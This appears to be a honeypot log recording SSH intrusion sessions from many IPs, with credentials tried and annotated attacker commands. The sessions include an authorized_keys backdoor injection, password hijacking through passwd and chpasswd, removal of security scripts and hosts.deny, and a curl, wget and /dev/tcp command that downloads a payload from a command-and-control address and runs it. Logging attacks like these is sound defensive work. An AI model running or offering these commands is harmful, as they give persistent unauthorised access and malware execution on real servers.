$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_44 (106.12.153.56) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-08 07:53 EDT Β· as ubuntu/ubuntu12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ubuntu12345678\nlu3qd1QT79yd\nlu3qd1QT79yd"|passwd|bash
$ Enter new UNIX password:
$ echo "ubuntu12345678\nlu3qd1QT79yd\nlu3qd1QT79yd\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_28 (115.190.159.160) β€” Haidian, China Β· 1 session Β· 20 cmds
2026-05-08 07:38 EDT Β· as postgres/Changeme_123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Changeme_123\nHqB2NzUJLLTz\nHqB2NzUJLLTz"|passwd|bash
$ Enter new UNIX password:
$ echo "Changeme_123\nHqB2NzUJLLTz\nHqB2NzUJLLTz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stein_root_25 (80.158.109.51) β€” Hanover, Germany Β· 1 session Β· 20 cmds
2026-05-08 02:33 EDT Β· as ubuntu/P@ssw0rd
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd\n9Rk4slZTdbz3\n9Rk4slZTdbz3"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\n9Rk4slZTdbz3\n9Rk4slZTdbz3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_29 (202.105.98.252) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-05-08 01:06 EDT Β· as root/cryptolendify!@2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 star_root_48 (76.79.213.70) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-05-08 00:53 EDT Β· as ubuntu/99999999
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "99999999\n3XnSXuTgT9FV\n3XnSXuTgT9FV"|passwd|bash
$ Enter new UNIX password:
$ echo "99999999\n3XnSXuTgT9FV\n3XnSXuTgT9FV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_59 (198.144.188.82) β€” Buffalo, United States Β· 2 sessions Β· 2 cmds
2026-05-07 23:44 EDT Β· as root/toor
nohup β†’ make executable
$ nohup /tmp/.sorry_2gWIzEPU >/tmp/.sorry_aGDg2Utz.log 2>&1 &
$ chmod +x /tmp/.sorry_2gWIzEPU // make executable
🎭 wraith_root_108 (101.36.108.213) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 59 cmds
2026-05-07 21:57 EDT Β· as crmadmin/P@ssw0rd, root/admina, ubuntu/555555555
nohup β†’ make executable
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:1jN03GS5NThJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "P@ssw0rd\nvA8uodbvffF6\nvA8uodbvffF6"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "P@ssw0rd\nvA8uodbvffF6\nvA8uodbvffF6\n"|passwd
$ echo -e "555555555\nu4krxEJ5Agpx\nu4krxEJ5Agpx"|passwd|bash
$ echo "555555555\nu4krxEJ5Agpx\nu4krxEJ5Agpx\n"|passwd
🎭 star_root_49 (72.253.251.3) β€” Lahaina, United States Β· 1 session Β· 20 cmds
2026-05-07 22:01 EDT Β· as ubuntu/22222
nohup β†’ make executable
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "22222\nXLMSuX2n5DGv\nXLMSuX2n5DGv"|passwd|bash
$ Enter new UNIX password:
$ echo "22222\nXLMSuX2n5DGv\nXLMSuX2n5DGv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_106 (186.103.169.12) β€” San Bernardo, Chile Β· 2 sessions Β· 40 cmds
2026-05-07 21:27 EDT Β· as crmadmin/P@ssw0rd, ubuntu/555555555
nohup β†’ make executable
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "555555555\nnasf0xvlZgSf\nnasf0xvlZgSf"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "555555555\nnasf0xvlZgSf\nnasf0xvlZgSf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "P@ssw0rd\n6lPxlABnqX2T\n6lPxlABnqX2T"|passwd|bash
$ echo "P@ssw0rd\n6lPxlABnqX2T\n6lPxlABnqX2T\n"|passwd
🎭 jade_root_31 (106.75.127.184) β€” Yangpu, China Β· 1 session Β· 20 cmds
2026-05-07 20:58 EDT Β· as ubuntu/555555555
nohup β†’ make executable
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "555555555\nqctMgrdDEjCs\nqctMgrdDEjCs"|passwd|bash
$ Enter new UNIX password:
$ echo "555555555\nqctMgrdDEjCs\nqctMgrdDEjCs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_32 (120.48.131.211) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-07 20:27 EDT Β· as user15/user15
nohup β†’ make executable
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "user15\nNITv463W5n5L\nNITv463W5n5L"|passwd|bash
$ Enter new UNIX password:
$ echo "user15\nNITv463W5n5L\nNITv463W5n5L\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_105 (27.50.25.190) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-05-07 19:11 EDT Β· as es/123321
nohup β†’ make executable
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123321\n9dW5W5t8uXE6\n9dW5W5t8uXE6"|passwd|bash
$ Enter new UNIX password:
$ echo "123321\n9dW5W5t8uXE6\n9dW5W5t8uXE6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_42 (122.115.232.82) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-07 19:10 EDT Β· as root/Cryptolendify$
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_121 (152.32.135.217) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 40 cmds
2026-05-07 19:00 EDT Β· as etluser/123456, ubuntu/qazxswedc123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "qazxswedc123\nhCMBSAnyGDeN\nhCMBSAnyGDeN"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "qazxswedc123\nhCMBSAnyGDeN\nhCMBSAnyGDeN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\n9FQN6Yv0JE7P\n9FQN6Yv0JE7P"|passwd|bash
$ echo "123456\n9FQN6Yv0JE7P\n9FQN6Yv0JE7P\n"|passwd
🎭 chateau_root_17 (173.249.41.171) β€” Lauterbourg, France Β· 1 session Β· 20 cmds
2026-05-07 17:50 EDT Β· as ubuntu/qazxswedc123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "qazxswedc123\nSLm33u6kxaSN\nSLm33u6kxaSN"|passwd|bash
$ Enter new UNIX password:
$ echo "qazxswedc123\nSLm33u6kxaSN\nSLm33u6kxaSN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_111 (49.0.80.15) β€” Bangkok, Thailand Β· 3 sessions Β· 3 cmds
2026-05-06 12:00 EDT Β· as root/blackcat, root/mail321!@#
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 cowboy_root (38.145.208.140) β€” Redondo Beach, United States Β· 6 sessions Β· 6 cmds
2026-05-07 13:41 EDT Β· as 1/1, admin/admin, root/123456
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m Γ—6 // obfuscated system check
🎭 panda_root_45 (112.35.99.188) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-05-07 16:10 EDT Β· as root/h3c.com!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 dragon_root_38 (121.37.220.50) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-05-07 15:44 EDT Β· as ubuntu/Mail~qwerty
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_13 (36.37.73.242) β€” Jakarta Pusat, Indonesia Β· 3 sessions Β· 3 cmds
2026-05-06 15:07 EDT Β· as root/blackcat, root/mail$2021
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 silk_root_30 (82.156.195.173) β€” Beijing, China Β· 1 session Β· 3 cmds
2026-05-07 15:27 EDT Β· as root/123456
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://106.13.23.149:6819/linux -o /tmp/0c5RddmdrF; if [ ! -f /tmp/0c5RddmdrF ]; then wget http://106.13.23.149:6819/linux -O /tmp/0c5RddmdrF; fi; if [ ! -f /tmp/0c5RddmdrF ]; then exec 6<>/dev/tcp/106.13.23.149/6819 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/0c5RddmdrF ; chmod +x /tmp/0c5RddmdrF && /tmp/0c5RddmdrF asHkWMRYwxzufnVfGTUTVGt78AnDRsRG5NIFGdL7WcZPyB/4eWJNGDEQQ2997hDHWMBc4dsSHNDgSMZB3BjxfXVfGjEHX298+hHCTsRI4dYFGtPkRsNOxgfxe2NXEDgbXnt5+B7cR8Bc+9MaGM/kXspMxRzwfntcGDgHVWJm8RjLWMNc59sdHdHjSMNFywf1cXVVBzIYV2148RnHVsNZ4M8ZGND7X8RYwx72cm1dGDAcTW9/7hvGRNxa59AFGtblUstAxxrgfGxDGzMQQ2px8QfDQcVS49McG8HnWsJYwxHwZmJUBzcYV2148RnHVsNR5s8aGtP7WcBA3BvyeWFUHDcdTWNm8RrEWMNb488ZGtfvUMdHxAnxempDHC4bXnV89hPKT8Ba9dkZBdDgXtxHyxzueWxeEzcZX2No+AfDRcRG5NIdBdPkXshOxxj2aG9aBzEbXHV5+B3cR8FQ79gTGdL1XsJYwx/ucHVZGzoQWG174BjAR9xd+9MYBdXjUspPwBvgfGxDGzMQQ2p/8QfDR8pS4tQdHsHkWsJYwB3uemldBzEfX2Fw8xvEVsZf+9MYEs/kUcNYwx73cm1fHjAJWWxm8hrLWMBG59URE9jlW9JHwBrueWlUBzIbXnV/9RPLRsZa9dAaEs/hXdxPxwfyfG9XEDcYWHt8+QfARcBG59EaBdPlWMhPxx7xaGpcGi4YVHV58BDcR8Ff79cfH9P1XMtYwBrzZmlZES4cWmF+9hrLVsZf+9M